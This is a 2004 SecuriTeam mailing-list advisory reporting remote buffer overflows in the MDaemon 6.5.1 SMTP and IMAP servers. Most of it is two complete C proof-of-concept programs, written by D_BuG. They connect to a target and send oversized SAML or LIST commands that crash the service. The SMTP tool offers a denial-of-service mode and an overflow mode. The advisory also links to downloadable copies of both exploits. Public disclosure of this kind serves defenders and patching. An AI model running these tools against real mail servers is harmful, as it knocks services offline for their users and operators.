[NT] Mdaemon SMTP and IMAP Server Remote Buffer Overflow (SAML, LIST commands)

From: SecuriTeam (support_at_securiteam.com)
Date: 09/25/04


To: list@securiteam.com
Date: 25 Sep 2004 23:43:27 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Mdaemon SMTP and IMAP Server Remote Buffer Overflow (SAML, LIST commands)
------------------------------------------------------------------------

SUMMARY

" <http://shop.mdaemontools.com/mdaemon.php> MDaemon offers a full range
of mail server functionality. MDaemon protects your users from spam and
viruses, provides full security, includes seamless web access to your
email via WorldClient, remote administration, and much more!".
By supplying a long parameter to the SAML , SOML, SEND, MAIL commands, a
remote attacker can crash the Mdaemon SMTP server.
By supplying a long parameter to the LIST command , a remote attacker
which can log on to the server can crash the Mdaemon IMAP server.

DETAILS

Vulnerable Systems:
 * Mdaemon smtp / imap server v6.5.1 (possibly previous versions are also
vulnerable).

Presented below are Proof of Concept code for the two vulnerabilites.

Mdaemon SMTP Server Exploit Code:
/////////////////////////////////////////////////////////////
// Remote DoS and proof-of-concept exploit //
// for //
// Mdaemon smtp server v6.5.1 //
// and //
// possible other version. //
// Find bug: D_BuG. //
// Author: D_BuG. //
// D_BuG@bk.ru //
// Data: 16/09/2004 //
// NOT PUBLIC! //
// Greets:Rasco. //
/////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int sock,err;
struct sockaddr_in sa;

int main (int argc, char *argv[])
 
 {
 
 printf("Remote DoS and proof-of-concept(buffer overflow) exploit\n");
 printf(" for \n");
 printf("Mdaemon smtp server v6.5.1 and possible other version.\n");
 if(argc!=4)
 {
 printf("Usage: %s <IPADDRESS> <PORT> <TARGET>\n",argv[0]);
 printf("Target:\n1.DoS.\n2.Proof-of-concept(buffer overflow).\n");
 printf("e.g.:%s 192.168.1.1 25 1\n",argv[0]);
 exit(-1);
 }

      sa.sin_family=AF_INET;
 sa.sin_port=htons(atoi(argv[2]));
 if(inet_pton(AF_INET, argv[1], &sa.sin_addr) <= 0)
 printf("Error inet_pton\n");
  
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 
 printf("[~]Connecting...\n");
 
 if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) <0)
 {
 printf("[-]Connect filed....\nExit...\n");
 exit(-1);
 }

int len=247;
 
if(atoi(argv[3])==2)
{
len++;
}
 
char szBuffer[len+7];
char buff[len];
char send[]="EHLO tester\n";
char send3[]="RCPT TO postmaster\n";
char rcv[1024];
int i;
for(i=0;i<len;i++)
    {
    buff[i]=0x41;
    }
    
sprintf(szBuffer,"SAML %s\n",buff);

  printf("[+]Ok!\n");
  sleep(2);
  printf("[~]Get banner...\n");
  if(read(sock,&rcv,sizeof(rcv)) !=-1){}
      
  if(strstr(rcv,"220")==NULL)
  {
  printf("[-]Failed!\n");
  }
  else
  {
  printf("[+]Ok!\n");
      }
         
  printf("[~]Send EHLO...\n");
  write(sock,send,sizeof(send)-1);
  sleep(2);
  memset(rcv,0,1024);
  if(read(sock,&rcv,sizeof(rcv)) !=-1){}
  
  if(strstr(rcv,"250")==NULL)
  {
  printf("[-]Failed...\n");
  }
  else
  {
  printf("[+]Ok!\n");
  }
  printf("[~]Send SAML...\n");
  write(sock,szBuffer,strlen(szBuffer));//Send SAML
  sleep(2);
  memset(rcv,0,1024);
  if(read(sock,&rcv,sizeof(rcv)) !=-1){}
  
  if(strstr(rcv,"250")==NULL)
  {
  printf("[-]Exploit failed...please check your version Mdaemon!\n");
  printf("[-]Exit...\n");
  exit(-1);
  }
  printf("[+]Ok!\n");
  
  printf("[~]Send RCPT...\n\n");
  write(sock,send3,sizeof(send3)-1);//Send RCPT
  sleep(2);
  if(atoi(argv[3])==2)
  {
  printf("[+]Crash service.....\n");
  }
  else
  {
  printf("[+]DoS service.....\n");
  }
  printf("[~]Done.\n");
  
  close(sock);
  
return 0;

}

Mdaemon IMAP Server Proof of Concept Code:
/////////////////////////////////////////////////////////////
// Remote proof-of-concept exploit //
// for //
// Mdaemon IMAP server v6.5.1 //
// and //
// possible other version. //
// Find bug: D_BuG. //
// Author: D_BuG. //
// D_BuG@bk.ru //
// Data: 16/09/2004 //
// NOT PUBLIC! //
// //
/////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int sock,err;
struct sockaddr_in sa;

int main (int argc, char *argv[])
 
 {
 
 printf("Remote proof-of-concept(buffer overflow) exploit\n");
 printf(" for \n");
 printf("Mdaemon IMAP server v6.5.1 and possible other version.\n");
 if(argc!=3)
 {
 printf("Usage: %s <IPADDRESS> <PORT>\n",argv[0]);
 printf("e.g.:%s 192.168.1.1 143\n",argv[0]);
 exit(-1);
 }

    sa.sin_family=AF_INET;
 sa.sin_port=htons(atoi(argv[2]));
 if(inet_pton(AF_INET, argv[1], &sa.sin_addr) <= 0)
 printf("Error inet_pton\n");
  
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 
 printf("[~]Connecting...\n");
 
 if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) <0)
 {
 printf("[-]Connect filed....\nExit...\n");
 exit(-1);
 }

char send[]="0001 LOGIN ""test"" ""console""\r\n";
char send3[]=
"007x LIST "
"""aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAA"""
"""
*BBBBBBBBBBaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAc"""
"\r\n\r\n";
char rcv[1024];

  printf("[+]Ok!\n");
  sleep(2);
  printf("[~]Get banner...\n");
  if(read(sock,&rcv,sizeof(rcv)) !=-1){}
      
  if(strstr(rcv,"IMAP")==NULL)
  {
  printf("[-]Failed!\n");
  }
  else
  {
  printf("[+]Ok!\n");
      }
         
  printf("[~]Send LOGIN and PASSWORD...\n");
  write(sock,send,sizeof(send)-1);
  sleep(2);
  memset(rcv,0,1024);
  if(read(sock,&rcv,sizeof(rcv)) !=-1){}
  
  if(strstr(rcv,"OK")==NULL)
  {
  printf("[-]Failed login or password...\nExit...");
  exit(-1);
  }
  
  printf("[+]Ok!\n");
  
  printf("[~]Send LIST...\n");
  write(sock,send3,sizeof(send3)-1);
  sleep(2);
  memset(rcv,0,1024);
  if(read(sock,&rcv,sizeof(rcv)) !=-1){}
  
  if(strstr(rcv,"BAD")!=NULL)
  {
  printf("[-]Exploit filed...please check your version Mdaemon!\n");
  printf("[-]Exit...\n");
  exit(-1);
  }
  printf("[+]Ok!\n");
  printf("[+]Crash service.....\n");
  printf("[~]Done.\n");
  
  close(sock);
  
return 0;

}

The exploits can be also found at:
 <http://www.securitylab.ru/_Exploits/2004/09/mdaemon_rcpt.c>
http://www.securitylab.ru/_Exploits/2004/09/mdaemon_rcpt.c
 <http://www.securitylab.ru/_Exploits/2004/09/mdaemon_imap.c>
http://www.securitylab.ru/_Exploits/2004/09/mdaemon_imap.c

ADDITIONAL INFORMATION

The information has been provided by <mailto:D_BuG@bk.ru> D_BuG.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [NEWS] Helix Universal Server Vulnerability (../../, Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... " <http://www.realnetworks.com/products/server/> Helix Universal Server, ... ServRegKey::ServRegKey(const char* pszKey, RegistryMemCache* pMemCache, ... version and platform from any remote RealServer. ...
    (Securiteam)
  • [NT] Multiple Vulnerabilities in HP Web JetAdmin (Read, Write, Execute, Path Disclosure, Password De
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... HP Web JetAdmin is an enterprise management system for large amounts of HP ... The web server is a modular service ... HP Web JetAdmin uses it's own encryption. ...
    (Securiteam)
  • [NEWS] Multiple Vulnerabilities in Oracle Database (Character Conversion, Extproc, Password Disclosu
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Multiple vulnerabilities were discovered in the (Oracle database server ... password is required to exploit this vulnerability. ...
    (Securiteam)
  • [NEWS] ColdFusion MX Oversize Error Message DoS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... ColdFusion MX "is the solution for building and deploying powerful web ... shoots up and stays there until the server completes writing the error ... a long string of data as a GET or POST request to ...
    (Securiteam)
  • [NT] F-Secure Internet Gatekeeper Content Scanning Server DoS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... " <http://www.f-secure.com/products/anti-virus/fsigk/> F-Secure Internet ... the Content Scanner Server. ... The vendor has been contacted and confirmed the existence of the problem ...
    (Securiteam)